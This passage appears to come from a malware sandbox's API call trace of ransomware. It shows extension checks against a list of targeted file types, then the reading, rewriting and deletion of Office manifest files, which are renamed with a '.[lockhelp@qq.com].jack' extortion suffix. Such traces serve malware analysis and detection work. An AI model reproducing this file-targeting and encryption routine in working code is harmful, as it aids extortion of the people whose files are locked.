lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.661] lstrlenW (lpString=".pdf") returned 4 [0204.661] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.661] lstrlenW (lpString=".xls") returned 4 [0204.661] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.661] lstrlenW (lpString=".xlsx") returned 5 [0204.661] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.661] lstrlenW (lpString=".ppt") returned 4 [0204.661] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.661] lstrlenW (lpString=".zip") returned 4 [0204.661] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.661] lstrlenW (lpString=".rar") returned 4 [0204.661] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.661] lstrlenW (lpString=".bz2") returned 4 [0204.661] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.661] lstrlenW (lpString=".7z") returned 3 [0204.661] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.662] lstrlenW (lpString=".dbf") returned 4 [0204.662] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.662] lstrlenW (lpString=".1cd") returned 4 [0204.662] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.662] lstrlenW (lpString=".jpg") returned 4 [0204.662] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.662] lstrlenW (lpString=".doc") returned 4 [0204.662] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.662] lstrlenW (lpString=".docx") returned 5 [0204.662] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.662] lstrlenW (lpString=".pdf") returned 4 [0204.662] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.662] lstrlenW (lpString=".xls") returned 4 [0204.662] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.662] lstrlenW (lpString=".xlsx") returned 5 [0204.662] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.662] lstrlenW (lpString=".ppt") returned 4 [0204.662] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.662] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.662] lstrlenW (lpString=".zip") returned 4 [0204.662] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.662] lstrlenW (lpString=".rar") returned 4 [0204.662] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.662] lstrlenW (lpString=".bz2") returned 4 [0204.662] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.662] lstrlenW (lpString=".7z") returned 3 [0204.662] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.663] lstrlenW (lpString=".dbf") returned 4 [0204.663] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.663] lstrlenW (lpString=".1cd") returned 4 [0204.663] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 104 [0204.663] lstrlenW (lpString=".jpg") returned 4 [0204.663] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.663] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0204.663] lstrlenW (lpString="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 53 [0204.663] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0204.663] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=1261) returned 1 [0204.663] CloseHandle (hObject=0x3d4) returned 1 [0204.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml")) returned 0x220 [0204.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0204.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0204.664] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.664] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0204.664] GetLastError () returned 0x0 [0204.664] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x4ed, lpOverlapped=0x0) returned 1 [0204.939] WriteFile (in: hFile=0x434, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x4f0, lpOverlapped=0x0) returned 1 [0204.940] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0204.940] WriteFile (in: hFile=0x434, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0204.942] SetEndOfFile (hFile=0x434) returned 1 [0204.942] CloseHandle (hObject=0x434) returned 1 [0204.945] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.946] SetEndOfFile (hFile=0x3d4) returned 1 [0204.947] CloseHandle (hObject=0x3d4) returned 1 [0204.947] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0204.947] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml")) returned 1 [0204.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.948] lstrlenW (lpString=".doc") returned 4 [0204.948] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.948] lstrlenW (lpString=".docx") returned 5 [0204.948] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.948] lstrlenW (lpString=".pdf") returned 4 [0204.948] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.948] lstrlenW (lpString=".xls") returned 4 [0204.948] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.948] lstrlenW (lpString=".xlsx") returned 5 [0204.948] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.948] lstrlenW (lpString=".ppt") returned 4 [0204.948] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.948] lstrlenW (lpString=".zip") returned 4 [0204.948] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.958] lstrlenW (lpString=".rar") returned 4 [0204.958] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.958] lstrlenW (lpString=".bz2") returned 4 [0204.958] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.958] lstrlenW (lpString=".7z") returned 3 [0204.958] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.958] lstrlenW (lpString=".dbf") returned 4 [0204.958] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.958] lstrlenW (lpString=".1cd") returned 4 [0204.958] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.958] lstrlenW (lpString=".jpg") returned 4 [0204.958] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.958] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.958] lstrlenW (lpString=".doc") returned 4 [0204.958] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.958] lstrlenW (lpString=".docx") returned 5 [0204.958] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.958] lstrlenW (lpString=".pdf") returned 4 [0204.958] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.958] lstrlenW (lpString=".xls") returned 4 [0204.958] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.958] lstrlenW (lpString=".xlsx") returned 5 [0204.959] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.959] lstrlenW (lpString=".ppt") returned 4 [0204.959] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.959] lstrlenW (lpString=".zip") returned 4 [0204.959] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.959] lstrlenW (lpString=".rar") returned 4 [0204.959] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.959] lstrlenW (lpString=".bz2") returned 4 [0204.959] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.959] lstrlenW (lpString=".7z") returned 3 [0204.959] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.959] lstrlenW (lpString=".dbf") returned 4 [0204.959] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.959] lstrlenW (lpString=".1cd") returned 4 [0204.959] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.959] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 104 [0204.959] lstrlenW (lpString=".jpg") returned 4 [0204.959] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.959] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0204.960] lstrlenW (lpString="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 53 [0204.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0204.961] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=2147) returned 1 [0204.961] CloseHandle (hObject=0x3d4) returned 1 [0204.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml")) returned 0x220 [0204.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0204.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0204.962] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.962] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0204.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0204.962] GetLastError () returned 0x0 [0204.962] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x863, lpOverlapped=0x0) returned 1 [0205.065] WriteFile (in: hFile=0x434, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x870, lpOverlapped=0x0) returned 1 [0205.066] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0205.067] WriteFile (in: hFile=0x434, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.067] SetEndOfFile (hFile=0x434) returned 1 [0205.067] CloseHandle (hObject=0x434) returned 1 [0205.069] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.069] SetEndOfFile (hFile=0x3d4) returned 1 [0205.070] CloseHandle (hObject=0x3d4) returned 1 [0205.070] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.070] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml")) returned 1 [0205.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.070] lstrlenW (lpString=".doc") returned 4 [0205.070] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.070] lstrlenW (lpString=".docx") returned 5 [0205.070] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.071] lstrlenW (lpString=".pdf") returned 4 [0205.071] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.071] lstrlenW (lpString=".xls") returned 4 [0205.071] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.071] lstrlenW (lpString=".xlsx") returned 5 [0205.071] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.071] lstrlenW (lpString=".ppt") returned 4 [0205.071] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.071] lstrlenW (lpString=".zip") returned 4 [0205.071] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.071] lstrlenW (lpString=".rar") returned 4 [0205.071] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.071] lstrlenW (lpString=".bz2") returned 4 [0205.071] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.071] lstrlenW (lpString=".7z") returned 3 [0205.071] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.071] lstrlenW (lpString=".dbf") returned 4 [0205.071] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.071] lstrlenW (lpString=".1cd") returned 4 [0205.071] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.071] lstrlenW (lpString=".jpg") returned 4 [0205.071] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.071] lstrlenW (lpString=".doc") returned 4 [0205.071] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.071] lstrlenW (lpString=".docx") returned 5 [0205.071] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.071] lstrlenW (lpString=".pdf") returned 4 [0205.072] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.072] lstrlenW (lpString=".xls") returned 4 [0205.072] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.072] lstrlenW (lpString=".xlsx") returned 5 [0205.072] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.072] lstrlenW (lpString=".ppt") returned 4 [0205.072] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.072] lstrlenW (lpString=".zip") returned 4 [0205.072] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.072] lstrlenW (lpString=".rar") returned 4 [0205.072] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.072] lstrlenW (lpString=".bz2") returned 4 [0205.072] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.072] lstrlenW (lpString=".7z") returned 3 [0205.072] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.072] lstrlenW (lpString=".dbf") returned 4 [0205.072] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.072] lstrlenW (lpString=".1cd") returned 4 [0205.072] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 104 [0205.072] lstrlenW (lpString=".jpg") returned 4 [0205.072] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.072] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.072] lstrlenW (lpString="AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 53 [0205.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0205.073] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x37dff14 | out: lpFileSize=0x37dff14*=215883) returned 1 [0205.073] CloseHandle (hObject=0x3d4) returned 1 [0205.073] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml")) returned 0x220 [0205.073] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.073] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0205.073] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.074] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37dfec0 | out: lpNewFilePointer=0x0) returned 1 [0205.074] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0205.205] GetLastError () returned 0x0 [0205.205] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x34b4b, lpOverlapped=0x0) returned 1 [0205.416] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x34b50, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x34b50, lpOverlapped=0x0) returned 1 [0205.420] ReadFile (in: hFile=0x3d4, lpBuffer=0x4331020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x37dfecc, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesRead=0x37dfecc*=0x0, lpOverlapped=0x0) returned 1 [0205.420] WriteFile (in: hFile=0x43c, lpBuffer=0x4331020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x37dfc94, lpOverlapped=0x0 | out: lpBuffer=0x4331020*, lpNumberOfBytesWritten=0x37dfc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.420] SetEndOfFile (hFile=0x43c) returned 1 